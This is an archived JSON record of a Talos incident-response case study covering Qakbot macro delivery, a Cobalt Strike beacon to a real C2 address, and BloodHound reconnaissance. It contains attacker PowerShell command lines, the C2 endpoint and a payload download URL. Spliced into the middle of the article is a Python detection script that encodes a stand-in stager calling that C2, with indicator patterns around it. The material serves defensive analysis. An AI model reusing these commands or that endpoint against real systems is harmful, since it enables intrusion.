{
	"id": "a66d35ca-f0db-4e38-825e-88c095d7420b",
	"created_at": "2026-04-06T00:18:12.116013Z",
	"updated_at": "2026-04-10T13:13:09.225764Z",
	"deleted_at": null,
	"sha1_hash": "8cc77c6b486915100ab1d22920d4487849a8f0fa",
	"title": "Case Study: Incident Response is a relationship-driven business",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 919363,
	"plain_text": "Case Study: Incident Response is a relationship-driven business\r\nBy Jonathan Munshaw\r\nPublished: 2021-05-17 · Archived: 2026-04-05 15:02:02 UTC\r\nMonday, May 17, 2021 08:00\r\nProof that incident response is \"the ultimate team sport\"\r\nBy Brad Garnett.\r\nhttps://blog.talosintelligence.com/2021/05/ctir-case-study.html\r\nPage 1 of 7\n\nIntroduction\r\nAs a seasoned incident responder, and now IR business leader here at Cisco Talos Incident Response (CTIR), I\r\nhave always said that incident response is the ultimate team sport. People are building blocks for organizations —\r\nand an effective incident response is about people, relationships and leveraging those relationships into the\r\nincident response workflow (processes and security instrumentation). This all plays a part in effectively containing\r\nand eradicating a determined adversary from the organization’s network environment.\r\nTo highlight this, I want to share a recent CTIR engagement that shows how we can work together with an\r\norganization’s IR and IT teams to quickly contain and remediate a threat. In this case, we dealt with an adversary\r\nthat could critically affect a business by deploying ransomware and virtually shutting down their entire\r\nnetwork. One of my favorite parts about my role with CTIR is the customer relationships I get to build around the\r\nworld by leveraging our awesome Cisco Secure collaboration technology to work from anywhere and at home\r\nduring the pandemic. I hear first-hand about the challenges and successes our customers have in facing today’s most\r\nchallenging threats.\r\nThe customer in this case study is a publicly traded company with more than $8 billion in\r\nrevenue. This incident was even more complicated because the company was going through a merger and\r\nacquisition when the customer CISO received a phone call from my organization. 
This customer had an existing\r\nIR retainer with us and has a strong relationship with my organization — to the extent that we are viewed as an\r\nextended team. We notified this customer after we identified suspicious Cobalt Strike activity and TTPs consistent\r\nwith pre-ransomware activity via SecureX telemetry.\r\n“Our Cisco Talos partners recognize the critical role relationships play in cybersecurity and Incident\r\nResponse. The Talos Team has invested significant time and effort in us to fully understand our people\r\nand environment before an incident occurred. Together, we built familiarity and trust between our teams\r\nthat can only be obtained through constant engagement and drills. When we were faced with a\r\nsignificant security incident, that trust and familiarity were the key differentiators that enabled us to\r\nsuccessfully contain the threat and minimize damages,” customer CISO. \r\nInitial notification\r\nDuring the initial notification, we supplied our customer with the specific hostname and indicators we contacted\r\nthem about. 
Below is the initial Cobalt Strike beacon that we identified in global telemetry:\r\ncmd.exe executed powershell -nop -w hidden -encodedcommand \u003credacted_base64_string\u003e \r\nThis was followed by the following command and control (C2) activity:\r\ncmd.exe executed powershell -nop -w hidden -encodedcommand \u003credacted_base64_string\u003e \r\npowershell.exe Connected to 95[.]174[.]65[.]241[:]4444 \r\nNote: Please visit the Talos Reputation Center for accurate threat information.\r\nDetection and analysis\r\nThis blog post will only highlight endpoint analysis, but the same approach was included in our analysis plan for\r\nthe two compromised domain controllers.\r\nBased upon our global SecureX telemetry and the customer’s Cisco Secure Endpoint deployment, we\r\nidentified patient zero and focused our forensic analysis efforts on three key systems as part of our analysis plan:\r\n1. Endpoint (Patient Zero): Windows 10 Enterprise 1909\r\n2. Domain Controller 1 (DC1): Windows Server 2016 Standard\r\n3. Domain Controller 2 (DC2): Windows Server 2012 R2 Standard\r\nPatient zero (Windows 10 endpoint)\r\nATT\u0026CK Technique with Sub-Technique (T1204.002) User Execution: Malicious File\r\nForensic analysis of the patient zero endpoint found that the file Document_1223672987_11142020.zip was\r\ndownloaded to \\Users\\%Compromised_User%\\Downloads. The RecentDocs registry entry shows that the user\r\nopened the ZIP archive shortly after the file was downloaded. Analysis of the Excel document contained within\r\nDocument_1223672987_11142020.zip showed a malicious macro that was set to execute once the document was\r\nopened. This macro attempted to download a payload from\r\n“http[:]//redacted[.]com/bpebqznfbkgl/55555555555.jpg”. 
This payload was then stored on the system in the\r\n“C:\\IntelCompany” folder and executed using the rundll32 executable. The analysis also shows that the payload\r\ndelivered by this document is the Qakbot banking trojan. The user was not warned of the macro’s existence before\r\nit was executed because this host was configured to trust all macros and all Excel documents from the internet.\r\nATT\u0026CK Technique with Sub-Technique (T1059.001) Command and Scripting Interpreter: PowerShell\r\nWe observed multiple executions of encoded PowerShell payloads carrying the Cobalt Strike beacon from the\r\n‘Compromised_User’ user during the analysis of the Windows PowerShell event log.\r\nAnalysis of the encoded payloads revealed that the Cobalt Strike command and control traffic was configured to\r\nuse the following user agents:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/74.0.3729.157 Safari/537.36 \r\nWindows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40 \r\nThe PowerShell event log also showed that at 2020-11-20T16:58:22Z, the following PowerShell command was\r\nexecuted to enumerate the domain controllers on the domain:\r\n[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select\r\n-property Name,IPAddress,OSVersion \r\nATT\u0026CK Technique with Sub-Technique (T1087.002) Account Discovery: Domain Account\r\nATT\u0026CK Technique (T1018) Remote System Discovery\r\nDuring analysis of the Master File Table ($MFT), we concluded that at 2020-11-20T17:55:29Z\r\n“20201120104627_BloodHound.zip”, which was an archive containing an open-source tool known as\r\nBloodHound used for enumerating Windows domains, was downloaded to the “\\Users\\Public” folder. At\r\n2020-11-20T18:22:00Z, the file “20201120132133_users.json” was created in\r\n“\\Users\\%Compromised_User%\\Downloads”. 
Although the contents of the file were not included in the evidence\r\ncollected, our assumption based upon supporting evidence is that this file is an output file from the execution of\r\nBloodHound containing information about the users within the domain. Similarly, at 2020-11-20T20:40:00Z the\r\nfile “20201120132133_computers.json” was created in the “\\Users\\%Compromised_User%\\Downloads” folder.\r\nWe concluded with high confidence that this file contained BloodHound output with information about the hosts\r\nwithin the domain.\r\nContainment, eradication and recovery\r\nThe collaborative, joint incident response between the customer’s IR team and CTIR led to a quick containment\r\nand full eradication of an active adversary in the enterprise IT environment that had the capability to deploy\r\nransomware. During these phases of the incident response, there were various actions performed, including, but\r\nnot limited to, re-imaging the patient zero endpoint, password resets, and the deployment of additional GPOs to\r\nrestrict document macros, PowerShell and SMB/admin shares. In every incident response, there are lessons\r\nlearned. This is how organizations continue to evolve defense and detection capabilities, threat models, and\r\nincident response plans and playbooks. If your organization is interested in any of these services, please reach out\r\nto CTIR for more information.\r\nPost-incident activity\r\nDuring our post-incident briefing with this customer and its executive leadership, we commended the customer\r\nand their entire organization for their swift response and collaboration with CTIR to successfully contain and\r\neradicate a determined adversary that likely would’ve caused millions of dollars in lost revenue and recovery\r\nexpenses. 
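For defenders who want to turn the endpoint findings above into something actionable, here is an added example written for this page; it is not code from the original post and not CTIR tooling. The Python script decodes -EncodedCommand payloads from constructed PowerShell command lines (the same base64-of-UTF-16LE form the initial beacon used), flags the -nop -w hidden launch pattern, checks decoded scripts for the C2 endpoint and the two user agents listed in the analysis, spots the domain controller enumeration one-liner, and matches the timestamp-prefixed BloodHound output file names from the $MFT findings. The sample log entries, the stand-in stager text and the file paths are constructed for the example; the only values taken from the post are the indicators themselves, and extending the file-name pattern to other collector object types (groups, domains, gpos, ous, sessions) is an assumption.

```python
import base64
import re

# Indicators taken from the post: the beacon C2 address and port, and the two
# user agents the decoded Cobalt Strike payloads were configured to use.
C2_IP = '95.174.65.241'
C2_PORT = 4444
KNOWN_BEACON_UAS = (
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/74.0.3729.157 Safari/537.36',
    'Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40',
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, so match
# -e, -ec, -enc and the full switch; likewise -w/-windowstyle and -nop/-noprofile.
ENC_RE = re.compile('-e(?:c|nc|ncodedcommand)?[ \t]+([A-Za-z0-9+/=]+)', re.I)
HIDDEN_RE = re.compile('-w(?:indowstyle)?[ \t]+hidden', re.I)
NOPROFILE_RE = re.compile('-nop(?:rofile)?(?=[ \t]|$)', re.I)
# Literal IPv4 endpoints inside a decoded script (port optional).
URL_RE = re.compile('https?://([0-9]{1,3}(?:[.][0-9]{1,3}){3})(?::([0-9]{1,5}))?')
# Collector output naming seen in the post (20201120132133_users.json etc.):
# a 14-digit timestamp prefix, an object type, and a .json or .zip suffix.
# Object types beyond users/computers are an assumption for this example.
BLOODHOUND_RE = re.compile(
    '^[0-9]{14}_(?:users|computers|groups|domains|gpos|ous|sessions|BloodHound)[.](?:json|zip)$', re.I)


def encode_ps(script):
    '''Encode a script the way powershell.exe expects for -EncodedCommand: base64 of UTF-16LE.'''
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


def decode_encoded_command(cmdline):
    '''Return the decoded script when cmdline carries an encoded payload, else None.'''
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def score_cmdline(cmdline):
    '''Classify one PowerShell command line against the TTPs described in the post.'''
    decoded = decode_encoded_command(cmdline)
    endpoints = []
    if decoded is not None:
        endpoints = [(ip, int(port) if port else 80) for ip, port in URL_RE.findall(decoded)]
    findings = {
        'encoded': decoded is not None,
        # -nop -w hidden -encodedcommand is the launch pattern of the initial beacon
        'hidden_noprofile': bool(HIDDEN_RE.search(cmdline) and NOPROFILE_RE.search(cmdline)),
        'endpoints': endpoints,
        'known_c2': (C2_IP, C2_PORT) in endpoints,
        'beacon_ua': next((ua for ua in KNOWN_BEACON_UAS if decoded and ua in decoded), None),
        # the domain controller enumeration one-liner from the PowerShell event log
        'dc_enum': bool(decoded) and 'GetCurrentDomain().DomainControllers' in decoded,
        'decoded': decoded,
    }
    findings['suspicious'] = bool(
        (findings['encoded'] and findings['hidden_noprofile'])
        or findings['known_c2'] or findings['beacon_ua'] or findings['dc_enum'])
    return findings


def triage(log):
    '''Run score_cmdline over (timestamp, cmdline) pairs and return the suspicious ones.'''
    return [(ts, f) for ts, f in ((ts, score_cmdline(c)) for ts, c in log) if f['suspicious']]


def bloodhound_artifacts(paths):
    '''Return the paths whose file name matches the collector output pattern.'''
    return [p for p in paths if BLOODHOUND_RE.match(re.split('[\\\\/]', p)[-1])]


# Constructed sample input (not telemetry from the engagement). The stager text is a
# harmless stand-in that only carries the C2 endpoint and user agent as strings.
STAGER = ('''$wc=New-Object Net.WebClient;'''
          '''$wc.Headers.Add('User-Agent','Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40');'''
          '''$wc.DownloadString('http://95.174.65.241:4444/a')''')
DC_ENUM = ('[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers'
           ' | Select -property Name,IPAddress,OSVersion')
SAMPLE_LOG = [
    ('2020-11-20T16:40:11Z', 'powershell -nop -w hidden -encodedcommand ' + encode_ps(STAGER)),
    ('2020-11-20T16:58:22Z', 'powershell -nop -w hidden -enc ' + encode_ps(DC_ENUM)),
    ('2020-11-20T17:02:05Z', 'powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1'),
    ('2020-11-20T17:05:40Z', 'powershell -e ' + encode_ps('Get-Date')),   # encoded but benign
]
SAMPLE_MFT_PATHS = [
    'C:\\Users\\Public\\20201120104627_BloodHound.zip',
    'C:\\Users\\Compromised_User\\Downloads\\20201120132133_users.json',
    'C:\\Users\\Compromised_User\\Downloads\\20201120132133_computers.json',
    'C:\\Users\\Compromised_User\\Downloads\\report_20201120.json',
]

if __name__ == '__main__':
    for ts, f in triage(SAMPLE_LOG):
        print(ts, {k: v for k, v in f.items() if k != 'decoded'})
        print('  decoded:', f['decoded'][:90])
    print('collector artifacts:', bloodhound_artifacts(SAMPLE_MFT_PATHS))
```

Run as a script it prints the two flagged entries (the beacon launch with the known C2 and user agent, and the hidden encoded DC enumeration) and skips both the plain script invocation and the encoded but benign Get-Date; the collector check returns the three BloodHound-style names and ignores the unrelated JSON file. On a real host the command lines would come from Security event ID 4688 process creation records (with command-line auditing enabled) or the PowerShell Operational log, and the file names from an $MFT parse, in place of the constructed lists.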
I am humbled to share this joint success story, as a lot of IR organizations are summoned once\r\nransomware has been deployed and the entire organization has been affected, which is something that we observe\r\nglobally and across industry verticals in our quarterly IR trends.\r\nConclusion\r\nI am grateful for the mutual, high-trust relationship between this customer and my organization. Incident response\r\nis a relationship-driven business. CTIR retainers are critical for organizations to augment their IR capabilities. A\r\ntested incident response plan that accurately reflects your organization’s current capabilities is critical, as\r\nevidenced in the two Case Studies we released today. Organizational and third-party relationships are tested during\r\na crisis. It’s important that there is an elevated level of trust between the IR team and the client, and that there is an\r\nestablished and agreed-upon process when time is of the essence to prevent an enterprise-wide ransomware attack\r\nwhen adversary pre-ransomware activity is identified. CISOs and executives should review and refine third-party\r\nrelationships on a routine basis. Have your third-party IR relationships been tried and tested — and are those\r\nrelationships resilient?\r\nIf you want to learn more about CTIR, check out our website here and visit us at this year’s virtual RSA\r\nConference this week.\r\nSource: https://blog.talosintelligence.com/2021/05/ctir-case-study.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2021/05/ctir-case-study.html"
	],
	"report_names": [
		"ctir-case-study.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434692,
	"ts_updated_at": 1775826789,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8cc77c6b486915100ab1d22920d4487849a8f0fa.pdf",
		"text": "https://archive.orkl.eu/8cc77c6b486915100ab1d22920d4487849a8f0fa.txt",
		"img": "https://archive.orkl.eu/8cc77c6b486915100ab1d22920d4487849a8f0fa.jpg"
	}
}